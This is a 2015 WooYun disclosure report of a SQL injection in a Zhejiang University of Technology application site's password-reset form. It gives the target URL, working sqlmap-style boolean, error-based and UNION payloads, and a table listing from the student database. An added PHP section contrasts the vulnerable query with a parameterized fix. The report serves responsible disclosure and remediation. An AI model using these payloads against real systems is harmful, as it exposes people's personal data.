
Vulnerability summary

Defect ID: wooyun-2015-0149769

Title: SQL injection vulnerability in a system of Zhejiang University of Technology

Vendor: zjut.edu.cn

Author: ledoo

Submitted: 2015-10-27 11:22

Fixed: 2015-12-11 16:56

Published: 2015-12-11 16:56

Vulnerability type: SQL injection

Severity: Medium

Self-assessed rank: 10

Status: confirmed by the vendor

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2015-10-27: Details sent to the vendor, awaiting vendor action
2015-10-27: Vendor confirmed; details disclosed to the vendor only
2015-11-06: Details disclosed to core white hats and domain experts
2015-11-16: Details disclosed to regular white hats
2015-11-26: Details disclosed to intern white hats
2015-12-11: Details disclosed to the public

Brief description:

SQL injection vulnerability in a system of Zhejiang University of Technology

Detailed description:

http://www.apply.zjut.edu.cn/en/student/login/fpassword
(POST)
findpassword=Reset Password&code=Verification Code&email=1'


The email parameter is injectable.

(Screenshot: QQ图片20151027110706.png)


Proof of vulnerability:

The database contains a large amount of international students' personal information.

Place: POST
Parameter: email
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
Payload: findpassword=Reset Password&code=Verification Code&email=-5404%' OR (6778=6778)#
Type: error-based
Title: MySQL OR error-based - WHERE or HAVING clause
Payload: findpassword=Reset Password&code=Verification Code&email=-6171%' OR 1 GROUP BY CONCAT(0x7161716371,(SELECT (CASE WHEN (9966=9966) THEN 1 ELSE 0 END)),0x71766f7771,FLOOR(RAND(0)*2)) HAVING MIN(0)#
Type: UNION query
Title: MySQL UNION query (random number) - 35 columns
Payload: findpassword=Reset Password&code=Verification Code&email=-5577%' UNION ALL SELECT 3639,3639,3639,3639,3639,3639,3639,CONCAT(0x7161716371,0x4b64794b4b486c596d43,0x71766f7771),3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639,3639#
---
web application technology: Apache 2.4.12, PHP 5.5.24
back-end DBMS: MySQL 5
Database: apply
+------------------------------------------+---------+
| Table | Entries |
+------------------------------------------+---------+
| cucas_formitem | 30517 |
| cucas_apply_template_info | 22935 |
| cucas_formtopic | 14093 |
| cucas_attachmentstopic | 6515 |
| cucas_apply_history | 5081 |
| cucas_templateclass | 4090 |
| cucas_apply_attachment_info | 1628 |
| cucas_admin_logs | 969 |
| cucas_system_group_menu | 927 |
| cucas_student_info | 660 |
| cucas_apply_info | 439 |
| cucas_app_log | 373 |
| cucas_major | 248 |
| cucas_apply_order_info | 174 |
| cucas_budget | 174 |
| cucas_deposit_info | 169 |
| cucas_app_getoffer | 161 |
| cucas_print_fields | 159 |
| cucas_message | 128 |
| cucas_message_record | 84 |
| cucas_user_message | 84 |
| cucas_school_accommodation_prices | 82 |
| cucas_credentials | 69 |
| cucas_mail_record | 54 |
| cucas_applyscholarship_info | 52 |
| cucas_admin_info | 26 |
| cucas_category_info | 26 |
| cucas_message_log | 24 |
| cucas_mail_dot | 23 |
| cucas_pages_info | 20 |
| cucas_print_template | 19 |
| cucas_faculty | 18 |
| cucas_buliding_floor_room | 17 |
| cucas_user_room | 16 |
| cucas_theme_file | 15 |
| cucas_major_course | 11 |
| cucas_system_group | 11 |
| cucas_agency_info | 9 |
| cucas_quarterage_info | 8 |
| cucas_module_info | 7 |
| cucas_room_electric_user | 7 |
| cucas_ppt_info | 6 |
| cucas_insurance_info | 5 |
| cucas_room_electric_record | 5 |
| cucas_school_accommodation_campus_info | 5 |
| cucas_attachments | 4 |
| cucas_degree_info | 4 |
| cucas_scholarship_info | 4 |
| cucas_school_accommodation_buliding | 4 |
| cucas_theme_info | 4 |
| cucas_commission_record | 3 |
| cucas_school_accommodation_buliding_info | 3 |
| cucas_image_info | 2 |
| cucas_landlord_info | 2 |
| cucas_major_content | 2 |
| cucas_major_images | 2 |
| cucas_major_pl | 2 |
| cucas_notice_info | 2 |
| cucas_out_room | 2 |
| cucas_school_accommodation_campus | 2 |
| cucas_school_accommodation_prices_info | 2 |
| cucas_test_paper | 2 |
| cucas_paypal | 1 |
| cucas_pickup_info | 1 |
| cucas_question_info | 1 |
+------------------------------------------+---------+

Fix recommendation:

Validate and filter the parameter.

Copyright notice: when republishing, credit the source ledoo@WooYun
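To make the recommended fix concrete, here is an added PHP/PDO illustration (not code from the affected application or from the report): the password-reset lookup written with string concatenation, which is the pattern the `email=1'` probe above triggers, beside a version that validates the address and binds it as a query parameter. The table name comes from the proof section; the column names, the LIKE clause (suggested by the `%'` prefix of the reported payloads) and the connection details are assumptions.

```php
<?php
// Added example, not the affected system's code. Table name cucas_student_info
// appears in the report; column names and the LIKE clause are assumptions.

// Vulnerable pattern: the submitted email is concatenated straight into the
// SQL text, so a quote in the input ends the string literal and lets the rest
// of the input be parsed as SQL (the report's email=1' probe shows this).
function findAccountVulnerable(PDO $db, string $email): ?array
{
    $sql = "SELECT id, email FROM cucas_student_info WHERE email LIKE '%" . $email . "%'";
    $row = $db->query($sql)->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Hardened version: reject input that is not shaped like an email address,
// then pass the value as a bound parameter so MySQL receives it as data only.
function findAccountSafe(PDO $db, string $email): ?array
{
    if (filter_var($email, FILTER_VALIDATE_EMAIL) === false) {
        return null; // malformed address: treat as "no such account"
    }
    // Exact match instead of LIKE: a reset lookup has no reason to wildcard.
    $stmt = $db->prepare('SELECT id, email FROM cucas_student_info WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Disable emulated prepares so binding happens server-side in MySQL rather
// than by client-side quoting. Credentials here are placeholders.
$db = new PDO('mysql:host=localhost;dbname=apply;charset=utf8mb4', 'app_user', 'app_pass', [
    PDO::ATTR_ERRMODE            => PDO::ERRMODE_EXCEPTION,
    PDO::ATTR_EMULATE_PREPARES   => false,
]);

// The reset handler should only ever call the safe variant.
$account = findAccountSafe($db, (string) ($_POST['email'] ?? ''));
```

Detection-wise, the vulnerable form also leaks whether an address exists through error-based and boolean-based responses; the safe form returns null uniformly for malformed input and the same response shape for found and not-found, which removes that side channel.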


Vulnerability response

Vendor response:

Severity: Medium

Vulnerability rank: 9

Confirmed: 2015-10-27 16:54

Vendor reply:

Thank you for your help; we will handle it as soon as possible.

Latest status:

None yet